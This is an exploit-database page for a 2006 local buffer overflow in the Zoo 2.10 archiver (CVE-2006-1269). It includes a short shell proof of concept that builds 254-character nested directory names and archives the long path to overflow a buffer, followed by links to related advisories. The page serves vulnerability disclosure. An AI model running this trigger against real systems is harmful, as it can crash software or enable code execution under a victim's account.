Lucene search
Josh Bressers1337DAY-ID-22021HistoryMar 12, 2014 - 12:00 a.m.
Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability
2014-03-1200:00:00
Josh Bressers
0day.today
16
0.0004 Low
EPSS
Percentile
0.4%
Josh Bressers
source: http://www.securityfocus.com/bid/17126/info
Zoo is prone to a local buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.
An attacker can exploit this issue to execute arbitrary code in the context of the victim user running the affected application to potentially gain elevated privileges.
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
touch feh
cd ../..
zoo a arch.zoo `perl -e 'print "A"x254 . "/" . "A"x254 . "/feh"'`
# 0day.today [2018-01-08] #Related
openvas
openvas
Gentoo Security Advisory GLSA 200603-12 (zoo)
2008-09-24 00:00:00
Gentoo Security Advisory GLSA 200603-12 (zoo)
2008-09-24 00:00:00
prion
prion
Buffer overflow
2006-03-19 02:02:00
gentoo
gentoo
zoo: Buffer overflow
2006-03-16 00:00:00
cve
cve
CVE-2006-1269
2006-03-19 02:02:00
nessus
nessus
GLSA-200603-12 : zoo: Buffer overflow
2006-03-16 00:00:00
debiancve
debiancve
CVE-2006-1269
2006-03-19 02:02:00
nvd
nvd
CVE-2006-1269
2006-03-19 02:02:00
ubuntucve
ubuntucve
CVE-2006-1269
2006-03-19 00:00:00
cvelist
cvelist
CVE-2006-1269
2006-03-19 02:00:00